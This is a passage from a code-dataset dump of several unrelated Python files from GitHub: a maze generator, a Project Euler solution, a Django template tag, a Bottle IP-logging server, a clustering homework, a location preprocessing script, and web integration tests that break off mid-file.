self.exist_test(d[0], d[1]):\n touching_xy.append(d)\n\n return touching_xy\n\n\nclass OrthogonalMaze:\n \"\"\"Flexible and powerful grid-based maze generation class.\n\n Methods:\n __init__ - Initializes variables, creates maze grid, starts progress report, makes maze, ends progress report.\n make - Makes a maze.\n start_location - Generates random, even x and y values.\n get_directions - Returns a list of the spaces from 4 directions 2 spaces from given ordered pair.\n dir_to_ordered_pair - Returns ordered pair of direction.\n loop_update - Updates progress reports.\n ordered_pair - Returns the ordered pair of passed index.\n limited_paths_check - Returns True if space is neighboring more than max_allowed spaces, False otherwise.\n choose_ind - Chooses index...only a stub.\n paths_only - Filters out all wall spaces from a list of spaces.\n get - Returns maze.\n display - Prints maze to terminal or console window.\n \"\"\"\n\n def __init__(self, debug, width=10, height=10):\n \"\"\"Initializes variables, creates maze grid, starts progress report, makes maze, ends progress report.\"\"\"\n global IN_BLENDER\n self.IN_BLENDER = IN_BLENDER\n\n if not width & 1 or not height & 1:\n logger.critical(\"Even maze dimension(s) w={}, h={}! Will likely crash!\".format(width, height))\n\n self.debug = debug\n self.width = width\n self.height = height\n\n self.maze = Maze(width, height)\n self.cells = []\n self.loops = 0\n self.estimated_loops = int((self.width * self.height * 1.25))\n\n if self.IN_BLENDER:\n self.bldr_prog = BlenderProgress(\"Layout Gen\", self.debug)\n self.bldr_prog.start()\n\n self.make()\n\n if self.IN_BLENDER:\n self.bldr_prog.finish()\n else:\n self.display()\n\n def make(self):\n \"\"\"Makes a maze. Only a stub.\"\"\"\n\n # generate random, but even x and y start location\n x, y = self.start_location()\n self.cells.append((x, y))\n self.maze.make_path(x, y)\n\n while self.cells:\n index = self.choose_ind()\n x, y = self.ordered_pair(index)\n\n directions = self.get_directions(x, y)\n directions = self.shuffle_directions(directions)\n for dx, dy in directions:\n\n # check that we're not by more than 1 path cell\n if self.limited_paths_check((dx, dy), 1):\n continue\n\n if self.maze.exist_test(dx, dy) and not self.maze.is_path(dx, dy):\n # space in between b/c we are doing doubles\n self.maze.make_path(round_avg(x, dx), round_avg(y, dy))\n # space (second one)\n self.maze.make_path(dx, dy)\n self.cells.append((dx, dy))\n index = None\n break\n\n # remove from cells list if index has not been found\n if index is not None:\n self.cells.pop(index)\n\n self.loop_update()\n\n def start_location(self):\n \"\"\"Generates random, even x and y values.\"\"\"\n return random.randint(0, int((self.width - 1) / 2)) * 2, random.randint(0, int((self.height - 1) / 2)) * 2\n\n def shuffle_directions(self, directions):\n return random.shuffle(directions)\n\n @staticmethod\n def get_directions(x, y):\n \"\"\"Returns a list of the spaces from 4 directions 2 spaces from given ordered pair.\"\"\"\n return [(x + 2, y), (x - 2, y), (x, y + 2), (x, y - 2)]\n\n @staticmethod\n def dir_to_ordered_pair(x, y, direction, dist=2):\n \"\"\"Returns ordered pair of direction.\"\"\"\n a = {'N': (x, y - dist), 'E': (x + dist, y), 'S': (x, y + dist), 'W': (x - dist, y)}\n try:\n return a[direction]\n except KeyError:\n logger.error(\"Error! Invalid direction!\")\n\n def loop_update(self, sleep_time=0.0):\n \"\"\"Updates progress reports.\"\"\"\n if self.IN_BLENDER:\n self.loops += 1\n progress = self.loops / self.estimated_loops\n self.bldr_prog.update(progress)\n else:\n self.display()\n if sleep_time:\n sleep(sleep_time)\n\n def ordered_pair(self, index):\n \"\"\"Returns the ordered pair of passed index.\"\"\"\n return self.cells[index][0], self.cells[index][1]\n\n def limited_paths_check(self, space, max_allowed):\n \"\"\"Returns True if space is neighboring more than max_allowed spaces, False otherwise.\"\"\"\n return len(self.paths_only(self.maze.find_exist_touching(space[0], space[1]))) > max_allowed\n\n def choose_ind(self):\n \"\"\"Chooses index...only a stub.\"\"\"\n return 0\n\n def paths_only(self, spaces):\n \"\"\"Filters out all wall spaces from a list of spaces.\"\"\"\n\n path_spaces = []\n for space in spaces:\n x, y = space\n if self.maze.is_path(x, y):\n path_spaces.append(space)\n return path_spaces\n\n def get(self):\n \"\"\"Returns maze.\"\"\"\n return self.maze\n\n def display(self, illum_list=()):\n \"\"\"Prints maze to terminal or console window.\"\"\"\n # x-axis labels\n tens_digit = [str([b for b in range(10)][int(a / 10)]) for a in range(self.width)]\n disp = \" \" + \"\".join(tens_digit).replace(\"0\", \" \") + \"\\n\"\n ones_digit = [str([b for b in range(10)][a % 10]) for a in range(self.width)]\n disp += \" \" + \"\".join(ones_digit) + \"\\n\"\n # x-axis arrows\n disp += \" \" + \"v\" * (self.width + 2) + \"\\n\"\n\n for y in range(self.height):\n # y-axis labels and arrows\n disp += \"{:2d}\".format(y) + \" >\"\n for x in range(self.width):\n # illuminated are shown with '$'\n if (x, y) in illum_list:\n disp += \"$\"\n # paths are shown with ' '\n elif self.maze.is_path(x, y):\n disp += \" \"\n # walls are shown with '#'\n else:\n disp += \"\\u2588\"\n # right-hand y-axis arrows and newlines\n disp += \"<\\n\"\n\n # bottom x-axis arrows\n disp += \" \" + \"^\" * (self.width + 2)\n print(disp)\n\n\nclass PassageCarverMaze(OrthogonalMaze):\n def __init__(self, **kwargs):\n super().__init__(**kwargs)\n\n\nclass GraphTheoryMaze(PassageCarverMaze):\n def __init__(self, bias_direction, bias, **kwargs):\n self.bias_direction = bias_direction\n self.bias = bias\n super().__init__(**kwargs)\n\n def shuffle_directions(self, directions):\n choices = ['X', 'Y']\n if self.bias_direction not in choices:\n self.bias_direction = random.choice(choices)\n\n if self.bias_direction == 'X':\n w_dirs = list(zip(directions, [0, 0, 1, 1]))\n elif self.bias_direction == 'Y':\n w_dirs = list(zip(directions, [1, 1, 0, 0]))\n else:\n w_dirs = list(zip(directions, [1, 1, 1, 1]))\n return weira.weira_shuffle(w_dirs, self.bias)\n\n\nclass BreadthFirstMaze(GraphTheoryMaze):\n def choose_ind(self):\n return 0\n\n\nclass DepthFirstMaze(GraphTheoryMaze):\n def choose_ind(self):\n return len(self.cells) - 1\n\n\nclass PrimsMaze(GraphTheoryMaze):\n def choose_ind(self):\n return random.randint(0, len(self.cells) - 1)\n\n\nclass BinaryTreeMaze(PassageCarverMaze):\n def __init__(self, directions='RANDOM', tileable=False, **kwargs):\n\n # parse 'directions' to make tuple\n if directions == 'NE':\n self.directions = ['N', 'E']\n elif directions == 'NW':\n self.directions = ['N', 'W']\n elif directions == 'SE':\n self.directions = ['S', 'E']\n elif directions == 'SW':\n self.directions = ['S', 'W']\n else:\n possible_dirs = [['N', 'E'], ['N', 'W'], ['S', 'E'], ['S', 'W']]\n self.directions = random.choice(possible_dirs)\n\n self.tileable = tileable\n\n super().__init__(**kwargs)\n\n def make(self):\n # start in top, left corner\n for x in range(self.width)[::2]:\n for y in range(self.height)[::2]:\n\n d = ''\n # this controls how we handle the edges\n if self.tileable:\n self.maze.make_path(x, y)\n d = random.choice(self.directions)\n else:\n temp_directions = []\n\n self.maze.make_path(x, y)\n\n # y-axis\n if y > 0 and 'N' in self.directions:\n temp_directions += 'N'\n elif y < self.height - 1 and 'S' in self.directions:\n temp_directions += 'S'\n\n # x-axis\n if x > 0 and 'W' in self.directions:\n temp_directions += 'W'\n elif x < self.width - 1 and 'E' in self.directions:\n temp_directions += 'E'\n\n # choose direction\n if temp_directions:\n d = random.choice(temp_directions)\n if d:\n nx, ny = self.dir_to_ordered_pair(x, y, d, 1)\n if self.maze.exist_test(nx, ny):\n self.maze.make_path(nx, ny)\n\n self.loop_update()\n\n\nclass SetBasedMaze(OrthogonalMaze):\n def __init__(self, **kwargs):\n self.tree = Tree()\n super().__init__(**kwargs)\n\n def knock_out_wall(self, x1, x2):\n self.maze.make_path(round(avg(x1, x2)), self.y)\n\n\nclass KruskalsMaze(PassageCarverMaze, SetBasedMaze):\n def __init__(self, **kwargs):\n super().__init__(**kwargs)\n\n def make(self):\n \"\"\"Relies on odd dimensions:\n\n +-------------------+\n | 0 | | 0 | | 0 |\n +---+---+---+---+---+\n | | X | | X | |\n +---+---+---+---+---+\n | 0 | | 0 | | 0 |\n +---+---+---+---+---+\n | | X | | X | |\n +---+---+---+---+---+\n | 0 | | 0 | | 0 |\n +-------------------+\n\n Notes:\n 1. the X's are always walls\n 2. the ' 's are sometimes walls\n 3. the 0's are always paths\n\n \"\"\"\n\n # create the tree and carve out the 0's\n self.tree = Tree()\n for x in range(self.width)[::2]:\n for y in range(self.height)[::2]:\n self.tree.new_node((x, y))\n self.maze.make_path(x, y)\n\n # create a list of all the walls\n walls = []\n for y in range(self.height):\n for x in range(self.width)[::2]:\n if y & 1:\n walls.append((x, y))\n else:\n if x + 1 < self.width:\n walls.append((x + 1, y))\n\n random.shuffle(walls)\n\n while walls:\n w = walls.pop()\n # if the wall's y-value is odd, the paths will be up and down\n if w[1] & 1:\n if self.tree.get_root((w[0], w[1] + 1)) != self.tree.get_root((w[0], w[1] - 1)):\n self.maze.make_path(w[0], w[1])\n # parent the roots of the two path spaces to each other\n self.tree.parent(self.tree.get_root((w[0], w[1] + 1)), self.tree.get_root((w[0], w[1] - 1)))\n else:\n if self.tree.get_root((w[0] + 1, w[1])) != self.tree.get_root((w[0] - 1, w[1])):\n self.maze.make_path(w[0], w[1])\n self.tree.parent(self.tree.get_root((w[0] + 1, w[1])), self.tree.get_root((w[0] - 1, w[1])))\n\n self.loop_update()\n\n\nclass EllersMaze(PassageCarverMaze, SetBasedMaze):\n def __init__(self, bias=0.0, **kwargs):\n self.bias = bias\n self.y = 0\n super().__init__(**kwargs)\n\n def make(self):\n # create all nodes we will ever need to use (we only build one row at a time)\n for a in range(self.width)[::2]:\n self.tree.new_node(name=a)\n\n # make all of these paths\n for x in self.tree.get_nodes():\n self.maze.make_path(x, 0)\n\n # loop over every other y-value so if height = 5 we loop: 0, 2, 4 as y\n for y in range(self.height)[::2]:\n self.y = y # update here so we don't have to keep passing it as an arg\n\n # combine sets - use bias\n for node in self.tree.get_nodes():\n neighbor = node + 2\n\n # this must be tried b/c neighbor +2 (so out of range of keys)...dict is\n # unordered so we can't use slicing to skip the last one :(\n try:\n # if they are already the same set type we would introduce a loop\n if self.tree.get_root(node) == self.tree.get_root(neighbor):\n continue\n except KeyError:\n continue\n\n if random.random() > 1 - (1 - self.bias) and y < self.height - 1:\n self.combine_sets(node, neighbor)\n\n self.loop_update()\n\n # drop down sets - use drop_down_chance?\n if y < self.height - 1:\n self.drop_down()\n\n # knock out walls in the bottom row to remove isolated regions\n self.finish_bottom()\n\n def combine_sets(self, x1, x2):\n # self.tree.unparent(x2)\n root = self.tree.get_root(x2)\n self.tree.parent(root, x1)\n\n # knock out wall between on maze\n self.knock_out_wall(x1, x2)\n\n def drop_down(self):\n def drop(x):\n if self.maze.exist_test(x, self.y + 1):\n self.maze.make_path(x, self.y + 1)\n self.maze.make_path(x, self.y + 2)\n return x\n\n dropped = []\n for root in self.tree.get_roots():\n nodes_on_rt = [a for a in self.tree.get_nodes() if self.tree.child_of(a, root)] + [root]\n # drop AT LEAST one from each 'root'...\n for _ in nodes_on_rt:\n dropped.append(drop(random.choice(nodes_on_rt)))\n\n # make the rest become roots\n for leaf in self.tree.get_nodes():\n if leaf not in dropped:\n self.tree.replacement_child_shift_detach(leaf)\n self.maze.make_path(leaf, self.y + 2)\n\n def finish_bottom(self):\n for node in self.tree.get_nodes():\n neighbor = node + 2\n # this must be tried b/c neighbor +2 (so out of range of keys)...dict is\n # unordered so we can't use slicing to skip the last one :(\n try:\n if self.tree.get_root(node) != self.tree.get_root(neighbor):\n self.combine_sets(node, neighbor)\n except KeyError:\n continue\n\n\ndef main():\n # BinaryTreeMaze('NW', debug=True, width=33, height=23)\n # DepthFirstMaze(bias_direction='RANDOM', bias=.5, debug=True, width=99, height=45)\n # PrimsMaze(bias_direction='RANDOM', bias=.5, debug=True, width=99, height=45)\n # BreadthFirstMaze(bias_direction='RANDOM', bias=.5, debug=True, width=99, height=45)\n EllersMaze(bias=0.75, debug=True, width=99, height=45)\n # KruskalsMaze(debug=True, width=99, height=45)\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"ekaj2/UltiMaze","sub_path":"maze_tools.py","file_name":"maze_tools.py","file_ext":"py","file_size_in_byte":21473,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"61"} +{"seq_id":"35805687753","text":"# Task 18 - Python\n# Maximum path sum I\n\nimport math\nimport time\n\ntriangle = [list(map(int, line.split())) for line in open('pe18_data_set.txt').readlines()]\n\ndef path():\n # Dynamic Methods for Bottom-Up\n for row in range(len(triangle) - 1, 0, -1):\n for col in range(0, row):\n triangle[row - 1][col] += max(triangle[row][col], triangle[row][col + 1])\n return triangle[0][0]\n\ndef main():\n time_start = time.time()\n max_route = path()\n\n print(\"Answer: {0} => Calculated in: {1}\".format(max_route, (time.time() - time_start)))\n\nif __name__ == '__main__':\n main()","repo_name":"WillGreen98/Project-Euler","sub_path":"Tasks 1-99/Task 18/Task-18.py","file_name":"Task-18.py","file_ext":"py","file_size_in_byte":598,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"43632398770","text":"from django import template\nfrom django.core.urlresolvers import reverse\n\nfrom django_project import settings\n\n\nregister = template.Library()\n\n@register.simple_tag\ndef url_abs(name, *args):\n\t\"\"\"\n\tBasically identical to the built-in url tag, but includes the domain name\n\t\"\"\"\n\tprotocol = settings.PROTOCOL\n\tdomain = settings.DOMAIN\n\turl = reverse(name, args=args)\n\tabs_path = '{}://{}{}'.format(protocol, domain, url)\n\t\n\treturn abs_path\n\n\n","repo_name":"ortegagingrich/inventory-app","sub_path":"django_project/utils/templatetags/url_abs.py","file_name":"url_abs.py","file_ext":"py","file_size_in_byte":438,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"7103710551","text":"#!/usr/bin/env python\n\ntry:\n from bottle import Bottle, route, run, request, abort\n ext_deps = True\nexcept ImportError:\n ext_deps = False\nfrom datetime import datetime\nfrom ipaddress import ip_address\nimport argparse\nimport shelve\nimport hmac\nimport sys\nimport traceback\nimport socket\nfrom tools import reverse_lookup, get_ip_address\n\nif not ext_deps:\n sys.stderr.write(\"Missing external dependency: bottle. Please install it first.\\n\")\n sys.exit(2)\n\nDATA = None\nSERVER_SECRET = None\nDEBUG = False\n\napp = Bottle()\n\n@app.route('/log')\ndef log():\n try:\n name = request.query.name\n salt = request.query.salt\n auth = request.query.auth\n if not hmac.compare_digest(auth, hmac.new(SERVER_SECRET.encode('utf-8'), salt.encode('utf-8'), digestmod='sha1').hexdigest()):\n raise NameError('Auth code incorrect.')\n messagesig = request.query.messagesig\n clienttime = request.query.clienttime\n host = request.query.host\n hostip = get_ip_address(request.query.hostip)\n reversehost = request.query.reversehost\n clienttime = datetime.strptime(clienttime, \"%Y-%m-%dT%H:%M:%S.%f\")\n servertime = datetime.utcnow()\n ip = get_ip_address(request.remote_addr)\n family = socket.AF_INET if ip.version == 4 else socket.AF_INET6\n reverseclient = reverse_lookup(str(ip), family=family)\n dataset = dict(host=host, reversehost=reversehost, hostip=str(hostip), name=name, salt=salt, messagesig=messagesig, auth=auth, clienttime=clienttime, servertime=servertime, ip=str(ip), reverseclient=reverseclient, type='server')\n DATA[servertime.isoformat()] = dataset\n except Exception as ex:\n if DEBUG:\n tb = traceback.format_exc()\n return {'success': False, 'exception': \"{}: {}\\n{}\".format(type(ex), ex, tb)}\n else:\n return {'success': False, 'exception': \"{}\".format(ex)}\n # customizations of the dataset to be returned to client:\n del dataset['clienttime']\n dataset['servertime'] = servertime.isoformat()\n dataset['ip'] = request.remote_addr\n dataset['hostip'] = request.query.hostip\n return {'success': True, 'data': dataset }\n\ndef make_json_serializable(d):\n \"\"\"\n Make dataset d JSON serializable.\n \"\"\"\n d['clienttime'] = d['clienttime'].isoformat()\n d['servertime'] = d['servertime'].isoformat()\n d['hostip'] = d['hostip']\n d['ip'] = d['ip']\n return d\n\n@app.route('/list/by/')\ndef list_log_entries(grouped):\n if grouped not in ('ip', 'name'): abort(404, 'Requested grouping not supported')\n by_ip = dict()\n for key in DATA:\n d = DATA[key]\n make_json_serializable(d)\n try:\n by_ip[d[grouped]].append(d)\n except KeyError:\n by_ip[d[grouped]] = [d]\n return dict(entries=by_ip)\n\ndef is_ip(ip):\n try:\n ip = ip_address(ip)\n return True\n except ValueError:\n return False\n\n@app.route('/stats')\ndef stats():\n ret = dict()\n last_dates = list()\n unique = {\n 'ipv4_client': set(),\n 'ipv6_client': set(),\n 'reverseclient': set()\n }\n for key in DATA:\n d = DATA[key]\n unique['reverseclient'].add(d['reverseclient'])\n if ip_address(d['ip']).version == 4:\n unique['ipv4_client'].add(d['ip'])\n else:\n unique['ipv6_client'].add(d['ip'])\n last_dates.append((d['servertime'], key))\n for key in unique:\n unique[key] = sorted(list(unique[key]))\n unique[key] = [str(val) for val in unique[key]]\n unique['reverseclient'] = [dom for dom in unique['reverseclient'] if not is_ip(dom)]\n unique['reverseclient'] = ['.'.join(y[::-1]) for y in sorted([dom.split('.')[::-1] for dom in unique['reverseclient']])]\n last_dates.sort(reverse=True)\n last_dates = last_dates[:4]\n last_entries = [make_json_serializable(DATA[last[1]]) for last in last_dates]\n ret['last'] = last_entries\n ret['unique'] = unique\n return ret\n\ndef main():\n\n global SERVER_SECRET, DATA, DEBUG\n\n parser = argparse.ArgumentParser(description='IP Logger Server - Logging the remote IP addresses of trusted clients.')\n parser.add_argument('shelvefile', help='The file to store previous requests in.')\n parser.add_argument('--server-secret', metavar='R@Nd0MK3y', help='The secret code of this server.', required=True)\n parser.add_argument('--server-adapter', metavar='wsgiref', default='wsgiref', help='Which server to run this web app with. Depends on 3rd party Python modules. If you need IPv6, try \"cherrypy\".')\n parser.add_argument('--host', metavar='0.0.0.0', default='0.0.0.0', help='The host/IP to bind the server to. Use \"::\" for IPv6.')\n parser.add_argument('--port', metavar=2000, default=2000, type=int, help='The port the server should listen at. Default: 2000.')\n parser.add_argument('--debug', action='store_true', help='Enable debugging mode.')\n\n args = parser.parse_args()\n\n DEBUG = args.debug\n SERVER_SECRET = args.server_secret\n DATA = shelve.open(args.shelvefile)\n print(\"Currently stored entries: {}\".format(len(DATA)))\n \n run(app, server=args.server_adapter, host=args.host, port=args.port, debug=DEBUG)\n \n DATA.close()\n\nif __name__ == '__main__':\n main()\n\n","repo_name":"pklaus/IP-Logger","sub_path":"server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":5290,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"61"} +{"seq_id":"14447781834","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Mar 16 23:33:43 2017\n\n@author: Kebinder\n\"\"\"\n\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport mltools as ml\nimport scipy.linalg\n\niris = np.genfromtxt('data/iris.txt', delimiter=None)\n\nX, Y = iris[:,0:2], iris[:,-1]\n\n# Problem 1: Basics of Clustering\n\n# 1A\nplt.scatter(X[:,0],X[:,1],color='b')\nplt.xlabel('feature x_1')\nplt.ylabel('feature_x_2')\nplt.title('Precluster algorithm graph')\nplt.show()\n\n# 1B\n\nz,c,d = ml.cluster.kmeans(X,5)\nml.plotClassify2D(None, X, z)\nplt.title('K = 5')\nplt.xlabel('feature x_1')\nplt.ylabel('feature_x_2')\nplt.show()\n\nz,c,d = ml.cluster.kmeans(X,20)\nml.plotClassify2D(None, X, z)\nplt.title('K = 20')\nplt.xlabel('feature x_1')\nplt.ylabel('feature_x_2')\nplt.show()\n\n# 1C\n\nz, c = ml.cluster.agglomerative(X, 5, method='min')\nplt.title(\"Agglomerative Single Linkage for K = 5\");\nml.plotClassify2D(None, X, z);\nplt.show()\n\nz, c = ml.cluster.agglomerative(X, 5, method='max')\nplt.title(\"Agglomerative Complete Linkage for K = 5\");\nml.plotClassify2D(None, X, z);\nplt.show()\n\nz, c = ml.cluster.agglomerative(X, 20, method='min')\nplt.title(\"Agglomerative Single Linkage for K = 20\");\nml.plotClassify2D(None, X, z);\nplt.show()\n\nz, c = ml.cluster.agglomerative(X, 20, method='max')\nplt.title(\"Agglomerative Complete Linkage for K = 20\");\nml.plotClassify2D(None, X, z);\nplt.show()\n\n'''\n The difference between k-means and agglomerative clusters is that\nagglomerative clusters are dendograms. If we use minimum distance \nbetween clusters it will produce a minimum spanning tree while a\nmaximum distance will avoid elongated clusters. This is shown\nin the single and complete linkage for each as single linkage has\na few clusters that take up the majority while the rest are small or\nsingle nodes. K-means base each cluster on a center point. The\ninitialization of each center may change how the clusters look. \nDistance based or random.\n'''\n\n# Problem 2: Eigenfaces\nX = np.genfromtxt(\"data/faces.txt\", delimiter=None) # load face dataset\nplt.figure()\n# pick a data point i for display\nimg = np.reshape(X[5,:],(24,24)) # convert vectorized data point to 24x24 image patch\nplt.imshow( img.T , cmap=\"gray\") # display image patch; you may have to squint\nplt.show()\n\n# 2A\nmean = np.mean(X)\nX0 = X-mean\n\nprint(\"X0 = \",X0)\n\n#2B\nU, S, V = scipy.linalg.svd(X0, full_matrices=False)\nW = U.dot(np.diag(S))\nprint (U.shape, S.shape, V.shape)\n\n#2C\nmse = []\nfor k in range(1, 11):\n X0hat = W[:, :k].dot(V[:k,:])\n mse.append(np.mean((X0 - X0hat)**2))\n# plot the data\n_, axis = plt.subplots()\naxis.plot(range(1,11), mse, c='red')\naxis.set_xticks(range(1,11))\nplt.show()\n\n#2D and 2E\nK = [5,10,50,100]\nfor k in K:\n X0hat = W[:, :k].dot(V[:k,:])\n f1 = X0hat[5,:]\n f2 = X0hat[6,:]\n img = np.reshape(f1,(24,24))\n plt.imshow(img.T, cmap=\"gray\")\n plt.title(\"Face 1 for K = \" + str(k))\n plt.show()\n img = np.reshape(f2, (24,24))\n plt.imshow(img.T, cmap=\"gray\")\n plt.title(\"Face 2 for K = \" + str(k))\n plt.show()\n ","repo_name":"kebinder/178_HW","sub_path":"HW5/HW5.py","file_name":"HW5.py","file_ext":"py","file_size_in_byte":2998,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"61"} +{"seq_id":"39411654332","text":"import os\n\nfrom tqdm import tqdm\nimport pandas as pd\nimport numpy as np\n\n\nfrom util import haversine\n\nif __name__ ==\"__main__\":\n home_work_info = pd.read_csv(os.path.join(\"Data\",\"Meta\", \"poi_category.csv\"), index_col= False, header = 0)\n \n valid_user = pd.read_csv(os.path.join(\"Data\",\"Meta\",\"valid_user.csv\"), index_col= None, header = 0)\n valid_user.set_index(\"UID\",inplace = True)\n valid_user.loc[:,'LOCATION'] = [np.nan]* valid_user.shape[0]\n for uid in tqdm(sorted(valid_user.query('VALID == \"VALID\"').index)):\n file = os.path.join(\"Data\", \"Interval\", uid, \"location_stay.csv\")\n if not os.path.exists(file):\n continue\n location = pd.read_csv(file, index_col = False, header = 0)\n location.loc[:,'CATEGORY'] = ['OTHERS'] * location.shape[0]\n location.reset_index(inplace = True)\n category_info = home_work_info.query(\"UID == @uid\")\n for idx, lat,long in location[['index','LAT','LONG']].values:\n for jdx, (poi_lat, poi_long, category) in enumerate(category_info[['LAT','LONG','CATEGORY']].values):\n if haversine((lat, long),(poi_lat,poi_long)) < 75:\n location.loc[idx, 'CATEGORY'] = category\n break\n if len(location[\"CATEGORY\"].unique()) == 1:\n valid_user.loc[uid,'LOCATION'] = f\"Only {location['CATEGORY'].unique()[0]} was found\"\n valid_user.loc[uid,'VALID'] = 'INVALID'\n\n location[['START','END','UTC','READABLE_START','READABLE_END','CATEGORY']]\\\n .to_csv(os.path.join(\"Data\",\"Interval\",uid,\"location.csv\"),index = False)\n location[['START','END','UTC','READABLE_START','READABLE_END','DUT_MS','READABLE_DUT','LAT','LONG','CATEGORY']]\\\n .to_csv(os.path.join(\"Data\",\"Interval\",uid,\"location_stay.csv\"),index = False)\n valid_user.reset_index(inplace = True)\n valid_user.to_csv(os.path.join(\"Data\",\"Meta\",\"valid_user.csv\"), index = False)","repo_name":"Kaist-ICLab/Causal-Inference-Tutorial","sub_path":"Preprocessing/location.py","file_name":"location.py","file_ext":"py","file_size_in_byte":1956,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"34741152529","text":"from __future__ import division\nfrom tests.integration_tests.framework.svc_test_collection import ServiceTestCollection\nfrom requests.cookies import RequestsCookieJar\n\n\n__author__ = 'jsternberg'\n\n\n###################################################################################################\n\n\nclass CoreWebCompanyTestCollection(ServiceTestCollection):\n\n def initialize(self):\n\n self.user_id = 'test@nexusri.com'\n self.source = \"core_tests.web_tests.test_company_page_endpoints.py\"\n self.context = {\"user_id\": self.user_id, \"source\": self.source}\n self.cooks = self.__login_test_user_get_cookies()\n\n def setUp(self):\n pass\n\n def tearDown(self):\n pass\n\n ##------------------------------------ Private Methods --------------------------------------##\n\n def __login_test_user_get_cookies(self):\n\n params = {\"email\": \"test@nexusri.com\", \"password\": self.config[\"TEST_USER_PASSWORD\"]}\n response = self.web_access.post(self.config[\"SECURITY_LOGIN_URL\"], params)\n assert response.ok\n assert isinstance(response.cookies, RequestsCookieJar)\n return response.cookies\n\n def __add_company(self, company_name):\n data = {\"type\": \"retail_parent\",\n \"ticker\": \"\",\n \"status\": \"operating\",\n \"description\": company_name,\n \"exchange\": \"None\",\n \"closure_confirmation_threshold_days\": 270}\n return self.mds_access.call_add_entity(\"company\", company_name, data, self.context)\n\n def __add_industry(self, industry_name):\n data = {\"industry_name\": industry_name}\n return self.mds_access.call_add_entity(\"industry\", industry_name, data, self.context)\n\n def __delete_entity(self, entity_type, entity_id):\n return self.mds_access.call_del_entity(entity_type, entity_id)\n\n ##------------------------------------ Typeahead Tests ---------------------------------------##\n\n def test_company_typeahead_empty(self):\n\n response = self.web_access.get(\"/api/companies\", cookies=self.cooks)\n self.test_case.assert200(response)\n self.test_case.assertIsNotNone(response.json())\n companies = response.json()\n self.test_case.assertEqual(companies, [])\n\n\n def test_company_typeahead_one_company(self):\n\n company_id = self.__add_company(\"Vandelay Industries\")\n\n expected_company_rec = {\n u'data': {\n u'status': u'operating',\n u'type': u'retail_parent'\n },\n u'_id': company_id,\n u'name': u'Vandelay Industries'\n }\n\n response = self.web_access.get(\"/api/companies\", cookies=self.cooks)\n self.test_case.assert200(response)\n self.test_case.assertIsNotNone(response.json())\n companies = response.json()\n self.test_case.assertEqual(companies, [expected_company_rec])\n\n try:\n self.__delete_entity(\"company\", company_id)\n except:\n pass\n\n\n def test_company_typeahead_multiple_companies(self):\n\n company_id1 = self.__add_company(\"Vandelay Industries 1\")\n company_id2 = self.__add_company(\"Vandelay Industries 2\")\n\n expected_company_list = [\n {\n u'data': {\n u'status': u'operating',\n u'type': u'retail_parent'\n },\n u'_id': company_id1,\n u'name': u'Vandelay Industries 1',\n\n },\n {\n u'data': {\n u'status': u'operating',\n u'type': u'retail_parent'\n },\n u'_id': company_id2,\n u'name': u'Vandelay Industries 2',\n }\n ]\n\n response = self.web_access.get(\"/api/companies\", cookies=self.cooks)\n self.test_case.assert200(response)\n self.test_case.assertIsNotNone(response.json())\n companies = response.json()\n self.test_case.assertEqual(companies, expected_company_list)\n\n try:\n self.__delete_entity(\"company\", company_id1)\n self.__delete_entity(\"company\", company_id2)\n except:\n pass\n\n def test_company_typeahead_multiple_companies_with_delete(self):\n\n company_id1 = self.__add_company(\"Vandelay Industries 1\")\n company_id2 = self.__add_company(\"Vandelay Industries 2\")\n\n expected_company_list = [\n {\n u'data': {\n u'status': u'operating',\n u'type': u'retail_parent'\n },\n u'_id': company_id1,\n u'name': u'Vandelay Industries 1'\n },\n {\n u'data': {\n u'status': u'operating',\n u'type': u'retail_parent'\n },\n u'_id': company_id2,\n u'name': u'Vandelay Industries 2'\n }\n ]\n\n response = self.web_access.get(\"/api/companies\", cookies=self.cooks)\n self.test_case.assert200(response)\n self.test_case.assertIsNotNone(response.json())\n companies = response.json()\n self.test_case.assertEqual(companies, expected_company_list)\n\n # delete 2nd company\n self.__delete_entity(\"company\", company_id2)\n expected_company_list.pop(1)\n\n response = self.web_access.get(\"/api/companies\", cookies=self.cooks)\n self.test_case.assert200(response)\n self.test_case.assertIsNotNone(response.json())\n companies = response.json()\n self.test_case.assertEqual(companies, expected_company_list)\n\n try:\n self.__delete_entity(\"company\", company_id1)\n except:\n pass\n\n ##------------------------------------ HTML Tests ---------------------------------------------##\n\n def test_view_edit_company_page(self):\n\n company_id = self.__add_company(\"Vandelay Industries\")\n\n # need to have at least 1 industry for the page to work\n industry_id = self.__add_industry(\"Architecture\")\n\n response = self.web_access.get(\"/company/%s\" % company_id, cookies=self.cooks)\n\n self.test_case.assert200(response)\n self.test_case.assertEqual(response.headers[\"content-type\"], \"text/html; charset=utf-8\")\n self.test_case.assertGreater(len(response.content), 1000)\n\n # make sure company name text input is in there\n self.test_case.assertRegexpMatches(response.content, r\"input id=\\\"txt_company_name\\\"[^>]*value=\\\"Vandelay Industries\\\"\")\n\n # make sure company name text input is in there\n self.test_case.assertIn('